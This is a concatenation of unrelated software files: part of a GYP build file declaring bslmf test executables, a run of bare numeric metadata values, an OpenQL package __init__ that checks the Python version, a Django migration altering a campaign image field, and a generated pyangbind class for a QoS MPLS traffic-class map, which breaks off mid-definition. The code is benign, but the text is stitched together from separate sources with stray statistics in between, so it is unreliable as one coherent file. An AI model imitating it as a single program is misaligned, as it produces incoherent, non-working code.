'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isarray.t.cpp' ], }, { 'target_name': 'bslmf_isbitwiseequalitycomparable.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isbitwiseequalitycomparable.t.cpp' ], }, { 'target_name': 'bslmf_isbitwisemoveable.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isbitwisemoveable.t.cpp' ], }, { 'target_name': 'bslmf_isclass.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isclass.t.cpp' ], }, { 'target_name': 'bslmf_isconst.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isconst.t.cpp' ], }, { 'target_name': 'bslmf_isconvertible.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isconvertible.t.cpp' ], }, { 'target_name': 'bslmf_isconvertibletoany.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isconvertibletoany.t.cpp' ], }, { 'target_name': 'bslmf_isenum.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isenum.t.cpp' ], }, { 'target_name': 'bslmf_isfloatingpoint.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isfloatingpoint.t.cpp' ], }, { 'target_name': 'bslmf_isfunction.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isfunction.t.cpp' ], }, { 'target_name': 'bslmf_isfundamental.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isfundamental.t.cpp' ], }, { 'target_name': 'bslmf_isintegral.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isintegral.t.cpp' ], }, { 'target_name': 'bslmf_islvaluereference.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_islvaluereference.t.cpp' ], }, { 'target_name': 'bslmf_ismemberfunctionpointer.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_ismemberfunctionpointer.t.cpp' ], }, { 'target_name': 'bslmf_ismemberobjectpointer.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_ismemberobjectpointer.t.cpp' ], }, { 'target_name': 'bslmf_ismemberpointer.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_ismemberpointer.t.cpp' ], }, { 'target_name': 'bslmf_ispair.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_ispair.t.cpp' ], }, { 'target_name': 'bslmf_ispointer.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_ispointer.t.cpp' ], }, { 'target_name': 'bslmf_ispointertomember.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_ispointertomember.t.cpp' ], }, { 'target_name': 'bslmf_ispolymorphic.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_ispolymorphic.t.cpp' ], }, { 'target_name': 'bslmf_isreference.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isreference.t.cpp' ], }, { 'target_name': 'bslmf_isrvaluereference.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isrvaluereference.t.cpp' ], }, { 'target_name': 'bslmf_issame.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_issame.t.cpp' ], }, { 'target_name': 'bslmf_istriviallycopyable.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_istriviallycopyable.t.cpp' ], }, { 'target_name': 'bslmf_istriviallydefaultconstructible.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_istriviallydefaultconstructible.t.cpp' ], }, { 'target_name': 'bslmf_isvoid.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isvoid.t.cpp' ], }, { 'target_name': 'bslmf_isvolatile.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isvolatile.t.cpp' ], }, { 'target_name': 'bslmf_matchanytype.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_matchanytype.t.cpp' ], }, { 'target_name': 'bslmf_matcharithmetictype.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_matcharithmetictype.t.cpp' ], }, { 'target_name': 'bslmf_memberfunctionpointertraits.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_memberfunctionpointertraits.t.cpp' ], }, { 'target_name': 'bslmf_metaint.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_metaint.t.cpp' ], }, { 'target_name': 'bslmf_nestedtraitdeclaration.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_nestedtraitdeclaration.t.cpp' ], }, { 'target_name': 'bslmf_nil.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_nil.t.cpp' ], }, { 'target_name': 'bslmf_removeconst.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_removeconst.t.cpp' ], }, { 'target_name': 'bslmf_removecv.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_removecv.t.cpp' ], }, { 'target_name': 'bslmf_removecvq.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_removecvq.t.cpp' ], }, { 'target_name': 'bslmf_removepointer.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_removepointer.t.cpp' ], }, { 'target_name': 'bslmf_removereference.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_removereference.t.cpp' ], }, { 'target_name': 'bslmf_removevolatile.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_removevolatile.t.cpp' ], }, { 'target_name': 'bslmf_selecttrait.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_selecttrait.t.cpp' ], }, { 'target_name': 'bslmf_switch.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_switch.t.cpp' ], }, { 'target_name': 'bslmf_tag.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_tag.t.cpp' ], }, { 'target_name': 'bslmf_typelist.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_typelist.t.cpp' ], }, ], }
34.64898
77
0.539247
2,229
25,467
5.834455
0.061463
0.049981
0.074971
0.104883
0.504114
0.411842
0.411842
0.411842
0.411842
0.408074
0
0.000054
0.269918
25,467
734
78
34.696185
0.699403
0.005301
0
0.350205
0
0
0.589048
0.308026
0
0
0
0
0.00684
1
0
true
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
1
99cf64985f998c65d2cacfaacd8edb39224b3b22
558
py
Python
swig/openql/__init__.py
mmoelle1/OpenQL
7d9e084cd3ecd237c9ea280801529d96cf67369a
[ "Apache-2.0" ]
null
null
null
swig/openql/__init__.py
mmoelle1/OpenQL
7d9e084cd3ecd237c9ea280801529d96cf67369a
[ "Apache-2.0" ]
null
null
null
swig/openql/__init__.py
mmoelle1/OpenQL
7d9e084cd3ecd237c9ea280801529d96cf67369a
[ "Apache-2.0" ]
1
2022-01-04T20:51:43.000Z
2022-01-04T20:51:43.000Z
# Author Imran Ashraf # The import syntax changes slightly between python 2 and 3, so we # need to detect which version is being used: from sys import version_info if version_info[0] == 3: PY3 = True elif version_info[0] == 2: PY3 = False else: raise EnvironmentError("sys.version_info refers to a version of " "Python neither 2 nor 3. This is not permitted. " "sys.version_info = {}".format(version_info)) if PY3: from .openql import Program, Kernel else: from openql import * # __all__ = [ init, schedule, compile ]
25.363636
69
0.689964
83
558
4.518072
0.614458
0.176
0.069333
0
0
0
0
0
0
0
0
0.025463
0.225806
558
21
70
26.571429
0.842593
0.297491
0
0.153846
0
0
0.27907
0
0
0
0
0
0
1
0
false
0
0.230769
0
0.230769
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99cf8bd15e6bfe4f73e426de65fa4c30ca3db7fc
573
py
Python
campaigns/migrations/0010_auto_20181117_2234.py
alimahdiyar/Developing-Community-Web
a663a687e0f286f197d4a7bf347f67cd130275f7
[ "MIT" ]
2
2018-06-02T12:30:00.000Z
2018-07-19T14:41:39.000Z
campaigns/migrations/0010_auto_20181117_2234.py
Developing-Community/Developing-Community-Web
a663a687e0f286f197d4a7bf347f67cd130275f7
[ "MIT" ]
5
2021-06-08T19:09:00.000Z
2022-03-11T23:25:14.000Z
campaigns/migrations/0010_auto_20181117_2234.py
Developing-Community/web
a663a687e0f286f197d4a7bf347f67cd130275f7
[ "MIT" ]
2
2018-05-27T14:58:34.000Z
2018-05-27T15:03:04.000Z
# Generated by Django 2.0.9 on 2018-11-17 22:34 import campaigns.models from django.db import migrations import sorl.thumbnail.fields class Migration(migrations.Migration): dependencies = [ ('campaigns', '0009_auto_20181116_1943'), ] operations = [ migrations.AlterField( model_name='campaign', name='image', field=sorl.thumbnail.fields.ImageField(blank=True, height_field='height_field', null=True, upload_to=campaigns.models.campaign_image_upload_location, width_field='width_field'), ), ]
27.285714
189
0.685864
67
573
5.686567
0.656716
0.07874
0.099738
0
0
0
0
0
0
0
0
0.068132
0.205934
573
20
190
28.65
0.769231
0.078534
0
0
1
0
0.129278
0.043726
0
0
0
0
0
1
0
false
0
0.214286
0
0.428571
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
99cfce15f277b305b1d6cfb0628ad6ec4ccc88f5
16,919
py
Python
pybind/slxos/v17r_2_00/qos_mpls/map_apply/apply_traffic_class_exp_map_name/__init__.py
extremenetworks/pybind
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
[ "Apache-2.0" ]
null
null
null
pybind/slxos/v17r_2_00/qos_mpls/map_apply/apply_traffic_class_exp_map_name/__init__.py
extremenetworks/pybind
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
[ "Apache-2.0" ]
null
null
null
pybind/slxos/v17r_2_00/qos_mpls/map_apply/apply_traffic_class_exp_map_name/__init__.py
extremenetworks/pybind
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
[ "Apache-2.0" ]
1
2021-11-05T22:15:42.000Z
2021-11-05T22:15:42.000Z
from operator import attrgetter import pyangbind.lib.xpathhelper as xpathhelper from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType from pyangbind.lib.base import PybindBase from decimal import Decimal from bitarray import bitarray import __builtin__ class apply_traffic_class_exp_map_name(PybindBase): """ This class was auto-generated by the PythonClass plugin for PYANG from YANG module brocade-qos-mpls - based on the path /qos-mpls/map-apply/apply-traffic-class-exp-map-name. Each member element of the container is represented as a class variable - with a specific YANG type. """ __slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__map_name_cmd2','__all_zero_map_cmd2','__default_map_cmd2','__All_cmd2',) _yang_name = 'apply-traffic-class-exp-map-name' _rest_name = 'traffic-class-exp' _pybind_generated_by = 'container' def __init__(self, *args, **kwargs): path_helper_ = kwargs.pop("path_helper", None) if path_helper_ is False: self._path_helper = False elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper): self._path_helper = path_helper_ elif hasattr(self, "_parent"): path_helper_ = getattr(self._parent, "_path_helper", False) self._path_helper = path_helper_ else: self._path_helper = False extmethods = kwargs.pop("extmethods", None) if extmethods is False: self._extmethods = False elif extmethods is not None and isinstance(extmethods, dict): self._extmethods = extmethods elif hasattr(self, "_parent"): extmethods = getattr(self._parent, "_extmethods", None) self._extmethods = extmethods else: self._extmethods = False self.__default_map_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="default-map-cmd2", rest_name="default-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-default-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP based on default map', u'alt-name': u'default-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True) self.__map_name_cmd2 = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="map-name-cmd2", rest_name="map-name-cmd2", parent=self, choice=(u'apply-traffic-class-exp', u'ca-map-name-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'<MAP NAME>;;Name for the MAP(Max 64)', u'cli-drop-node-name': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='map-name-type', is_config=True) self.__All_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="All-cmd2", rest_name="All", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply globally on all interface', u'alt-name': u'All'}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True) self.__all_zero_map_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="all-zero-map-cmd2", rest_name="all-zero-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-all-zero-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP 0', u'alt-name': u'all-zero-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True) load = kwargs.pop("load", None) if args: if len(args) > 1: raise TypeError("cannot create a YANG container with >1 argument") all_attr = True for e in self._pyangbind_elements: if not hasattr(args[0], e): all_attr = False break if not all_attr: raise ValueError("Supplied object did not have the correct attributes") for e in self._pyangbind_elements: nobj = getattr(args[0], e) if nobj._changed() is False: continue setmethod = getattr(self, "_set_%s" % e) if load is None: setmethod(getattr(args[0], e)) else: setmethod(getattr(args[0], e), load=load) def _path(self): if hasattr(self, "_parent"): return self._parent._path()+[self._yang_name] else: return [u'qos-mpls', u'map-apply', u'apply-traffic-class-exp-map-name'] def _rest_path(self): if hasattr(self, "_parent"): if self._rest_name: return self._parent._rest_path()+[self._rest_name] else: return self._parent._rest_path() else: return [u'qos-mpls', u'map-apply', u'traffic-class-exp'] def _get_map_name_cmd2(self): """ Getter method for map_name_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/map_name_cmd2 (map-name-type) """ return self.__map_name_cmd2 def _set_map_name_cmd2(self, v, load=False): """ Setter method for map_name_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/map_name_cmd2 (map-name-type) If this variable is read-only (config: false) in the source YANG file, then _set_map_name_cmd2 is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_map_name_cmd2() directly. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="map-name-cmd2", rest_name="map-name-cmd2", parent=self, choice=(u'apply-traffic-class-exp', u'ca-map-name-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'<MAP NAME>;;Name for the MAP(Max 64)', u'cli-drop-node-name': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='map-name-type', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """map_name_cmd2 must be of a type compatible with map-name-type""", 'defined-type': "brocade-apply-qos-mpls:map-name-type", 'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="map-name-cmd2", rest_name="map-name-cmd2", parent=self, choice=(u'apply-traffic-class-exp', u'ca-map-name-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'<MAP NAME>;;Name for the MAP(Max 64)', u'cli-drop-node-name': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='map-name-type', is_config=True)""", }) self.__map_name_cmd2 = t if hasattr(self, '_set'): self._set() def _unset_map_name_cmd2(self): self.__map_name_cmd2 = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="map-name-cmd2", rest_name="map-name-cmd2", parent=self, choice=(u'apply-traffic-class-exp', u'ca-map-name-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'<MAP NAME>;;Name for the MAP(Max 64)', u'cli-drop-node-name': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='map-name-type', is_config=True) def _get_all_zero_map_cmd2(self): """ Getter method for all_zero_map_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/all_zero_map_cmd2 (empty) """ return self.__all_zero_map_cmd2 def _set_all_zero_map_cmd2(self, v, load=False): """ Setter method for all_zero_map_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/all_zero_map_cmd2 (empty) If this variable is read-only (config: false) in the source YANG file, then _set_all_zero_map_cmd2 is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_all_zero_map_cmd2() directly. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="all-zero-map-cmd2", rest_name="all-zero-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-all-zero-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP 0', u'alt-name': u'all-zero-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """all_zero_map_cmd2 must be of a type compatible with empty""", 'defined-type': "empty", 'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="all-zero-map-cmd2", rest_name="all-zero-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-all-zero-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP 0', u'alt-name': u'all-zero-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)""", }) self.__all_zero_map_cmd2 = t if hasattr(self, '_set'): self._set() def _unset_all_zero_map_cmd2(self): self.__all_zero_map_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="all-zero-map-cmd2", rest_name="all-zero-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-all-zero-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP 0', u'alt-name': u'all-zero-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True) def _get_default_map_cmd2(self): """ Getter method for default_map_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/default_map_cmd2 (empty) """ return self.__default_map_cmd2 def _set_default_map_cmd2(self, v, load=False): """ Setter method for default_map_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/default_map_cmd2 (empty) If this variable is read-only (config: false) in the source YANG file, then _set_default_map_cmd2 is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_default_map_cmd2() directly. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="default-map-cmd2", rest_name="default-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-default-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP based on default map', u'alt-name': u'default-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """default_map_cmd2 must be of a type compatible with empty""", 'defined-type': "empty", 'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="default-map-cmd2", rest_name="default-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-default-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP based on default map', u'alt-name': u'default-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)""", }) self.__default_map_cmd2 = t if hasattr(self, '_set'): self._set() def _unset_default_map_cmd2(self): self.__default_map_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="default-map-cmd2", rest_name="default-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-default-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP based on default map', u'alt-name': u'default-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True) def _get_All_cmd2(self): """ Getter method for All_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/All_cmd2 (empty) """ return self.__All_cmd2 def _set_All_cmd2(self, v, load=False): """ Setter method for All_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/All_cmd2 (empty) If this variable is read-only (config: false) in the source YANG file, then _set_All_cmd2 is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_All_cmd2() directly. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="All-cmd2", rest_name="All", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply globally on all interface', u'alt-name': u'All'}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """All_cmd2 must be of a type compatible with empty""", 'defined-type': "empty", 'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="All-cmd2", rest_name="All", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply globally on all interface', u'alt-name': u'All'}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)""", }) self.__All_cmd2 = t if hasattr(self, '_set'): self._set() def _unset_All_cmd2(self): self.__All_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="All-cmd2", rest_name="All", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply globally on all interface', u'alt-name': u'All'}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True) map_name_cmd2 = __builtin__.property(_get_map_name_cmd2, _set_map_name_cmd2) all_zero_map_cmd2 = __builtin__.property(_get_all_zero_map_cmd2, _set_all_zero_map_cmd2) 